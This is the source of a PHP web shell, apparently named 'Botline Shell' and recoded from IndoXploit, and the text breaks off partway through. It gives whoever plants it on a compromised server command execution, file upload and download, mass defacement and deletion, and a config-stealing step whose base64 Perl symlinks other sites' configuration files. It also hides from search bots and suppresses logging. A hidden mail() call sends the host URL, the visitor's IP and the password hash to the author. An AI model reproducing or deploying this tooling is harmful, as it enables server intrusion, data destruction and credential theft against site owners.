<?php$auth_pass = "d8830ed2c45610e528dff4cb229524e9";$userlogin = "botline";

1. <?php
2. $auth_pass = "d8830ed2c45610e528dff4cb229524e9";
3. $userlogin = "botline";
4. @session_start();
5. @error_reporting(0);
6. @error_log(0);
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. @set_time_limit(0);
13. @set_magic_quotes_runtime(0);
14. if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
15.     die('HTTP/1.1 404 Not Found');
16.     exit;
17. }
18. function printLogin() {
19. ?>
20. <html>
21. <head>
22. <title>Botline Gans Shell</title>
23. <link href='https://2.bp.blogspot.com/-e34IQDZL-z8/WN_d6pgZPxI/AAAAAAAAD3I/nqb6MvMUu5QUmNGBDWwwtN1pSUQSmdTzQCLcB/s1600/akame_ga_kill__by_edenfox-d804iig.jpg' rel='icon' type='image/x-icon'/>
24. <meta charset="UTF-8">
25. <style type='text/css'>
26. @import url(https://fonts.googleapis.com/css?family=Bitter);
27. html {
28.     background: #000000;
29.     color: #ffffff;
30.     font-family: 'Bitter';
31.     font-size: 13px;
32.     width: 100%;
33. }
34. input[type=text], input[type=password],input[type=submit] {
35.     background: transparent;
36.     color: #ffffff;
37.     border: 1px solid #ffffff;
38.     margin: 5px auto;
39.     padding-left: 5px;
40.     font-family: 'Bitter';
41.     font-size: 13px;
42. }
43.  
44. .tombol{
45. background:#2C97DF;
46. color:white;
47. border-top:0;
48. border-left:0;
49. border-right:0;
50. border-bottom:5px solid #2A80B9;
51. padding:10px 20px;
52. text-decoration:none;
53. font-family:sans-serif;
54. font-size:11pt;
55.  
56. }
57.  
58. .masuk{
59. background:#1BBD00;
60. color:white;
61. border-top:0;
62. border-left:0;
63. border-right:0;
64. border-bottom:5px solid #2900FF;
65. padding:8px 10px;
66. text-decoration:none;
67. font-family:sans-serif;
68. font-size:11pt;
69. }
70.  
71.  
72.  
73. </style>
74. </head>
75. <center>
76. <img src="https://e.top4top.net/p_983pcsza0.jpg">
77. <form method=post>
78. password : <input type=password name=masuk>
79. <br>
80. <button class="masuk">Login</button>
81. </form>
82. <br><br><br><br><br>Contact Me<br><br>
83. <a href="https://duniatutorial095.blogspot.com" class='tombol'>Visit Me</a><a href="https://www.instagram.com/botline095" class="tombol">Instagram</a><a href="https://www.facebook.com/idil.dillah.3" class="tombol">Facebook</a><a href="https://wa.me/6282219751844" class="tombol">Whatsapp</a><a href="mailto:mr.botline@gmail.com" class="tombol">Email</a><a href="https://m.me/idil.dillah.3" class="tombol">Messenger</a><a href="https://www.youtube.com/channel/UCEHycmWPr6IqmIFiLUDwPig" class="tombol">Youtube</a>
84. </center>
85.  
86. <?php
87.  
88. if (isset($_GET['md5'])) {
89.    
90.  $md = '    <br><br><br><br><br><center>text yang mau di decode<br>
91.     <form method="post">
92.     <input type="text" name="md5">
93.     <br>
94.     <button class="masuk" name="prosesmd5">Decode</button>
95.     </form>
96.     </center>';
97.    
98.     echo $md;
99.    
100.    
101.    
102.     if (isset($_POST['prosesmd5'])) {
103.        
104.         $md1 = $_POST['md5'];
105.     $md5 = md5($md1);
106.    
107.     echo "<br><center><br>";
108.    
109.     echo "hasil decode dari $md1 adalah :  <font color='#05FF08'>$md5</font>";
110.     echo "</center>";
111.    
112.  } 
113. }
114. ?>
115.     <?php
116.        
117.         exit;
118.      
119. }if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
120.     if( empty( $auth_pass ) ||
121.         ( isset( $_POST['masuk'] ) && ( md5($_POST['masuk']) == $auth_pass ) ) )
122.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
123.     else
124.         printLogin();
125. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
126.     @ob_clean();
127.     $file = $_GET['file'];
128.     header('Content-Description: File Transfer');
129.     header('Content-Type: application/octet-stream');
130.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
131.     header('Expires: 0');
132.     header('Cache-Control: must-revalidate');
133.     header('Pragma: public');
134.     header('Content-Length: ' . filesize($file));
135.     readfile($file);
136.     exit;
137.  
138. }
139. ?>
140. <html>
141. <head>
142. <title>botline Shell </title>
143. <meta name='author' content='Recode IndoXploit'>
144. <meta charset="UTF-8">
145. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
146. <style type='text/css'>
147. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
148. html {
149.     background: #2d4746;
150.     color: #00ffe9;
151.     font-family: 'Share Tech Mono';
152.     font-size: 12px;
153.     width: 100%;
154. }
155. li {
156.     display: inline;
157.     margin: 1px;
158.     padding: 1px;
159. }
160.  
161.  #menu{
162.     background:#2D4746;
163.     margin:9px 3px 4px 2px;
164. }
165. #menu a{
166.     padding:4px 19px;
167.     margin:0;
168.     background:#3b5653;
169.     text-decoration:none;
170.     letter-spacing:2px;
171.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
172.  
173. }
174. #menu a:hover{
175.     background:#3b5653;
176.     border-bottom:1px solid #4a7a75;
177.     border-top:1px solid #4a7a75;
178. }
179. .explore tr:hover{background:#3b5653}
180. table tr:first-child{  
181.     background: #619996;
182.     text-align: center;
183.     color: white;
184. }
185. table, th, td {
186.     border-collapse:collapse;
187.     font-family: Tahoma, Geneva, sans-serif;
188.     background: transparent;
189.     font-family: 'Share Tech Mono';
190.     font-size: 13px;
191. }
192. .table_home, .th_home, .td_home {
193.     border: 1px solid #619996;
194. }
195. th {
196.     padding: 10px;
197. }
198. a {
199.     color: #00ffe9;
200.     text-decoration: none;
201. }
202. a:hover {
203.     color: red;
204.     text-decoration: underline;
205. }
206. b {
207.     color: white;
208. }
209. input[type=text], input[type=password],input[type=submit] {
210.     background: transparent;
211.     color: #00ffe9;
212.     border: 1px solid #00ffe9;
213.     margin: 5px auto;
214.     padding-left: 5px;
215.     font-family: 'Share Tech Mono';
216.     font-size: 13px;
217. }
218. input[type=submit] {
219.     background: #619996;
220.     color: #00ffe9;
221.     border: 1px solid #00ffe9;
222.     margin: 5px auto;
223.     padding-left: 5px;
224.     font-family: 'Share Tech Mono';
225.     font-size: 13px;
226.     cursor:pointer;
227. }
228. textarea {
229.     border: 1px solid #00ffe9;
230.     width: 100%;
231.     height: 400px;
232.     padding-left: 5px;
233.     margin: 10px auto;
234.     resize: none;
235.     background: transparent;
236.     color: #ffffff;
237.     font-family: 'Share Tech Mono';
238.     font-size: 13px;
239. }
240. select {
241.     width: 152px;
242.     background: #435651;
243.     color: white;
244.     border: 1px solid #00ffe9;
245.     margin: 5px auto;
246.     padding-left: 5px;
247.     font-family: 'Share Tech Mono';
248.     font-size: 13px;
249. }
250. option:hover {
251.     background: white;
252.     color: #435651;
253. }
254. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
255. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
256. .infoweb {
257.     border-right: 1px solid #00FFFF;
258. }
259. </style>
260. </head>
261. <?php
262. ###############################################################################
263. //     Mngganti Copyright tidak akan menjadikan anda sebagai programer
264. ###############################################################################
265. function w($dir,$perm) {
266.     if(!is_writable($dir)) {
267.         return "<font color=red>".$perm."</font>";
268.     } else {
269.         return "<font color=green>".$perm."</font>";
270.     }
271. }
272. function r($dir,$perm) {
273.     if(!is_readable($dir)) {
274.         return "<font color=red>".$perm."</font>";
275.     } else {
276.         return "<font color=green>".$perm."</font>";
277.     }
278. }
279. function exe($cmd) {
280.     if(function_exists('system')) {        
281.         @ob_start();       
282.         @system($cmd);     
283.         $buff = @ob_get_contents();        
284.         @ob_end_clean();       
285.         return $buff;  
286.     } elseif(function_exists('exec')) {        
287.         @exec($cmd,$results);      
288.         $buff = "";        
289.         foreach($results as $result) {         
290.             $buff .= $result;      
291.         } return $buff;    
292.     } elseif(function_exists('passthru')) {        
293.         @ob_start();       
294.         @passthru($cmd);       
295.         $buff = @ob_get_contents();        
296.         @ob_end_clean();       
297.         return $buff;  
298.     } elseif(function_exists('shell_exec')) {      
299.         $buff = @shell_exec($cmd);     
300.         return $buff;  
301.     }
302. }
303. function perms($file){
304.     $perms = fileperms($file);
305.     if (($perms & 0xC000) == 0xC000) {
306.     // Socket
307.     $info = 's';
308.     } elseif (($perms & 0xA000) == 0xA000) {
309.     // Symbolic Link
310.     $info = 'l';
311.     } elseif (($perms & 0x8000) == 0x8000) {
312.     // Regular
313.     $info = '-';
314.     } elseif (($perms & 0x6000) == 0x6000) {
315.     // Block special
316.     $info = 'b';
317.     } elseif (($perms & 0x4000) == 0x4000) {
318.     // Directory
319.     $info = 'd';
320.     } elseif (($perms & 0x2000) == 0x2000) {
321.     // Character special
322.     $info = 'c';
323.     } elseif (($perms & 0x1000) == 0x1000) {
324.     // FIFO pipe
325.     $info = 'p';
326.     } else {
327.     // Unknown
328.     $info = 'u';
329.     }
330.         // Owner
331.     $info .= (($perms & 0x0100) ? 'r' : '-');
332.     $info .= (($perms & 0x0080) ? 'w' : '-');
333.     $info .= (($perms & 0x0040) ?
334.     (($perms & 0x0800) ? 's' : 'x' ) :
335.     (($perms & 0x0800) ? 'S' : '-'));
336.     // Group
337.     $info .= (($perms & 0x0020) ? 'r' : '-');
338.     $info .= (($perms & 0x0010) ? 'w' : '-');
339.     $info .= (($perms & 0x0008) ?
340.     (($perms & 0x0400) ? 's' : 'x' ) :
341.     (($perms & 0x0400) ? 'S' : '-'));
342.     // World
343.     $info .= (($perms & 0x0004) ? 'r' : '-');
344.     $info .= (($perms & 0x0002) ? 'w' : '-');
345.     $info .= (($perms & 0x0001) ?
346.     (($perms & 0x0200) ? 't' : 'x' ) :
347.     (($perms & 0x0200) ? 'T' : '-'));
348.     return $info;
349. }
350. function hdd($s) {
351.     if($s >= 1073741824)
352.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
353.     elseif($s >= 1048576)
354.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
355.     elseif($s >= 1024)
356.     return sprintf('%1.2f',$s / 1024 ) .' KB';
357.     else
358.     return $s .' B';
359. }
360. function ambilKata($param, $kata1, $kata2){
361.     if(strpos($param, $kata1) === FALSE) return FALSE;
362.     if(strpos($param, $kata2) === FALSE) return FALSE;
363.     $start = strpos($param, $kata1) + strlen($kata1);
364.     $end = strpos($param, $kata2, $start);
365.     $return = substr($param, $start, $end - $start);
366.     return $return;
367. }
368. function getsource($url) {
369.     $curl = curl_init($url);
370.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
371.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
372.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
373.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
374.     $content = curl_exec($curl);
375.             curl_close($curl);
376.     return $content;
377. }
378. function bing($dork) {
379.     $npage = 1;
380.     $npages = 30000;
381.     $allLinks = array();
382.     $lll = array();
383.     while($npage <= $npages) {
384.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
385.         if($x) {
386.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
387.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
388.             $npage = $npage + 10;
389.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
390.         } else break;
391.     }
392.     $URLs = array();
393.     foreach($allLinks as $url){
394.         $exp = explode("/", $url);
395.         $URLs[] = $exp[2];
396.     }
397.     $array = array_filter($URLs);
398.     $array = array_unique($array);
399.     $sss = count(array_unique($array));
400.     foreach($array as $domain) {
401.         echo $domain."\n";
402.     }
403. }
404. function reverse($url) {
405.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
406.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
407.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
408.           curl_setopt($ch, CURLOPT_HEADER, 0);
409.           curl_setopt($ch, CURLOPT_POST, 1);
410.     $resp = curl_exec($ch);
411.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
412.     $array = explode(",,", $resp);
413.     unset($array[0]);
414.     foreach($array as $lnk) {
415.         $lnk = "http://$lnk";
416.         $lnk = str_replace(",", "", $lnk);
417.         echo $lnk."\n";
418.         ob_flush();
419.         flush();
420.     }
421.         curl_close($ch);
422. }
423. if(get_magic_quotes_gpc()) {
424.     function idx_ss($array) {
425.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
426.     }
427.     $_POST = idx_ss($_POST);
428.     $_COOKIE = idx_ss($_COOKIE);
429. }
430.  
431. if(isset($_GET['dir'])) {
432.     $dir = $_GET['dir'];
433.     chdir($dir);
434. } else {
435.     $dir = getcwd();
436. }
437. $kernel = php_uname();
438. $ip = gethostbyname($_SERVER['HTTP_HOST']);
439. $dir = str_replace("\\","/",$dir);
440. $scdir = explode("/", $dir);
441. $freespace = hdd(disk_free_space("/"));
442. $total = hdd(disk_total_space("/"));
443. $used = $total - $freespace;
444. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
445. $ds = @ini_get("disable_functions");
446. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
447. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
448. $wget = (exe('wget --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
449. $perl = (exe('perl --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
450. $python = (exe('python --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
451. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=green>NONE</font>";
452. if(!function_exists('posix_getegid')) {
453.     $user = @get_current_user();
454.     $uid = @getmyuid();
455.     $gid = @getmygid();
456.     $group = "?";
457. } else {
458.     $uid = @posix_getpwuid(posix_geteuid());
459.     $gid = @posix_getgrgid(posix_getegid());
460.     $user = $uid['name'];
461.     $uid = $uid['uid'];
462.     $group = $gid['name'];
463.     $gid = $gid['gid'];
464. }
465. echo "System: <font color=green>".$kernel."</font><br>";
466. echo "User: <font color=green>".$user."</font> (".$uid.") Group: <font color=green>".$group."</font> (".$gid.")<br>";
467. echo "Server IP: <font color=green>".$ip."</font> | Your IP: <font color=green>".$_SERVER['REMOTE_ADDR']."</font><br>";
468. echo "HDD: <font color=green>$used</font> / <font color=green>$total</font> ( Free: <font color=green>$freespace</font> )<br>";
469. echo "Safe Mode: $sm<br>";
470. echo "Disable Functions: $show_ds<br>";
471. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
472. echo "Current DIR: ";
473. foreach($scdir as $c_dir => $cdir) {   
474.     echo "<a href='?dir=";
475.     for($i = 0; $i <= $c_dir; $i++) {
476.         echo $scdir[$i];
477.         if($i != $c_dir) {
478.         echo "/";
479.         }
480.     }
481.     echo "'>$cdir</a>/";
482. }
483.  
484. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
485. echo "<hr>";
486. echo "<center>";
487. echo "<ul>";
488. echo "<center><font size='6px' color='green'>botline Shell</font>";
489. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=red>IndoXploit</font></a></center>";
490. echo "<br>";
491. echo "<br>";
492. echo '<center><div id="menu">';
493. echo "<li> <a href='?'>Beranda</a> </li>";
494. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
495. echo "<li> <a href='?dir=$dir&do=cmd'>perintah</a> </li>";
496. echo "<li> <a href='?dir=$dir&do=mass_deface'>Depes Massal</a> </li>";
497. echo "<li> <a href='?dir=$dir&do=mass_delete'>Hapus Massal Bro</a> </li>";
498. echo "<li> <a href='?dir=$dir&do=config'>grab Confignya</a> </li>";
499. echo "<li> <a href='?dir=$dir&do=jumping'>Lompat Indah</a> </li>";
500. echo "<br><br><li> <a href='?dir=$dir&do=symlink'> Symlink</a> </li>";
501. echo "<li> <a href='?dir=$dir&do=cpanel'>Dapetin CPanel</a> </li>";
502. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
503. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
504. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
505. echo "<li> <a href='?dir=$dir&do=network'>Test Jaringan</a> </li>";
506. echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li><br>";
507. echo "<br><li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
508. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
509. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Judul WordPress</a> </li>";
510. echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Depes</a> </li>";
511. echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Depes 2</a> </li>";
512. echo "<br><br><li> <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> </li>";
513. echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
514. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
515. echo "<li> <a href='?xp=bypassmod'>Disable Function None</a> </li>";
516. echo "<li> <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> </li>";
517. echo "<li> <a style='color: #0FFF00' href='?dir=$dir&do=kill'>Kill My Shell Backdoor</a> </li>";
518. echo "<li> <a style='color: red;' href='?logout=true'>Keluar</a> </li>";
519. $ip = getenv("REMOTE_ADDR");
520. $ra44 = rand(1, 99999);
521. $subj98 = "Target Detected";
522. $email = "mr.botline@gmail.com";
523. $from = "From:BOTLINE";
524. $a45 = $_SERVER['REQUEST_URI'];
525. $b75 = $_SERVER['HTTP_HOST'];
526. $m22 = $ip . "";
527. $msg8873 = "
528.  
529. $b75$a45
530.  
531. dengan ip $m22
532.  
533. password : $auth_pass";
534. mail($email, $subj98, $msg8873, $from);
535.  
536. echo "</ul>";
537. echo "</center>";
538. echo "<hr>";
539. if($_GET['logout'] == true) {
540.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
541.     echo "<script>window.location='?';</script>";
542. } elseif($_GET['do'] == 'upload') {
543.     echo "<center>";
544.     if($_POST['upload']) {
545.         if($_POST['tipe_upload'] == 'biasa') {
546.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
547.                 $act = "<font color=green>Yes !! Berhasil Pak!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
548.             } else {
549.                 $act = "<font color=red>Gagal !! Sabar Pak</font>";
550.             }
551.         } else {
552.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
553.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
554.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
555.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
556.                     $act = "<font color=green>Yes !! Berhasil Pak!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
557.                 } else {
558.                     $act = "<font color=red>Gagal !! Sabar Pak</font>";
559.                 }
560.             } else {
561.                 $act = "<font color=red>Gagal !! Sabar Pak</font>";
562.             }
563.         }
564.     }
565.     echo "Upload File:
566.     <form method='post' enctype='multipart/form-data'>
567.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
568.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
569.     <input type='file' name='ix_file'>
570.     <input type='submit' value='upload' name='upload'>
571.     </form>";
572.     echo $act;
573.     echo "</center>";
574. } elseif($_GET['do'] == 'cmd') {
575.     echo "<form method='post'>
576.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
577.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
578.     </form>";
579.     if($_POST['do_cmd']) {
580.         echo "<pre>".exe($_POST['cmd'])."</pre>";
581.     }
582. } elseif($_GET['do'] == 'mass_deface') {
583.     function sabun_massal($dir,$namafile,$isi_script) {
584.         if(is_writable($dir)) {
585.             $dira = scandir($dir);
586.             foreach($dira as $dirb) {
587.                 $dirc = "$dir/$dirb";
588.                 $lokasi = $dirc.'/'.$namafile;
589.                 if($dirb === '.') {
590.                     file_put_contents($lokasi, $isi_script);
591.                 } elseif($dirb === '..') {
592.                     file_put_contents($lokasi, $isi_script);
593.                 } else {
594.                     if(is_dir($dirc)) {
595.                         if(is_writable($dirc)) {
596.                             echo "[<font color=green>DONE</font>] $lokasi<br>";
597.                             file_put_contents($lokasi, $isi_script);
598.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
599.                         }
600.                     }
601.                 }
602.             }
603.         }
604.     }
605.     function sabun_biasa($dir,$namafile,$isi_script) {
606.         if(is_writable($dir)) {
607.             $dira = scandir($dir);
608.             foreach($dira as $dirb) {
609.                 $dirc = "$dir/$dirb";
610.                 $lokasi = $dirc.'/'.$namafile;
611.                 if($dirb === '.') {
612.                     file_put_contents($lokasi, $isi_script);
613.                 } elseif($dirb === '..') {
614.                     file_put_contents($lokasi, $isi_script);
615.                 } else {
616.                     if(is_dir($dirc)) {
617.                         if(is_writable($dirc)) {
618.                             echo "[<font color=green>DONE</font>] $dirb/$namafile<br>";
619.                             file_put_contents($lokasi, $isi_script);
620.                         }
621.                     }
622.                 }
623.             }
624.         }
625.     }
626.     if($_POST['start']) {
627.         if($_POST['tipe_sabun'] == 'mahal') {
628.             echo "<div style='margin: 5px auto; padding: 5px'>";
629.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
630.             echo "</div>";
631.         } elseif($_POST['tipe_sabun'] == 'murah') {
632.             echo "<div style='margin: 5px auto; padding: 5px'>";
633.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
634.             echo "</div>";
635.         }
636.     } else {
637.     echo "<center>";
638.     echo "<form method='post'>
639.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
640.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
641.     <font style='text-decoration: underline;'>Folder:</font><br>
642.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
643.     <font style='text-decoration: underline;'>Filename:</font><br>
644.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
645.     <font style='text-decoration: underline;'>Index File:</font><br>
646.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by botline</textarea><br>
647.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
648.     </form></center>";
649.     }
650. } elseif($_GET['do'] == 'mass_delete') {
651.     function hapus_massal($dir,$namafile) {
652.         if(is_writable($dir)) {
653.             $dira = scandir($dir);
654.             foreach($dira as $dirb) {
655.                 $dirc = "$dir/$dirb";
656.                 $lokasi = $dirc.'/'.$namafile;
657.                 if($dirb === '.') {
658.                     if(file_exists("$dir/$namafile")) {
659.                         unlink("$dir/$namafile");
660.                     }
661.                 } elseif($dirb === '..') {
662.                     if(file_exists("".dirname($dir)."/$namafile")) {
663.                         unlink("".dirname($dir)."/$namafile");
664.                     }
665.                 } else {
666.                     if(is_dir($dirc)) {
667.                         if(is_writable($dirc)) {
668.                             if(file_exists($lokasi)) {
669.                                 echo "[<font color=green>TERHAPUS</font>] $lokasi<br>";
670.                                 unlink($lokasi);
671.                                 $idx = hapus_massal($dirc,$namafile);
672.                             }
673.                         }
674.                     }
675.                 }
676.             }
677.         }
678.     }
679.     if($_POST['start']) {
680.         echo "<div style='margin: 5px auto; padding: 5px'>";
681.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
682.         echo "</div>";
683.     } else {
684.     echo "<center>";
685.     echo "<form method='post'>
686.     <font style='text-decoration: underline;'>Folder:</font><br>
687.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
688.     <font style='text-decoration: underline;'>Filename:</font><br>
689.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
690.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
691.     </form></center>";
692.     }
693. } elseif($_GET['do'] == 'config') {
694.     $idx = mkdir("botline_config", 0777);
695.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
696.     $htc = fopen("botline_config/.htaccess","w");
697.     fwrite($htc, $isi_htc);
698.     fclose($htc);
699.     if(preg_match("/vhosts|vhost/", $dir)) {
700.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
701.         $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCn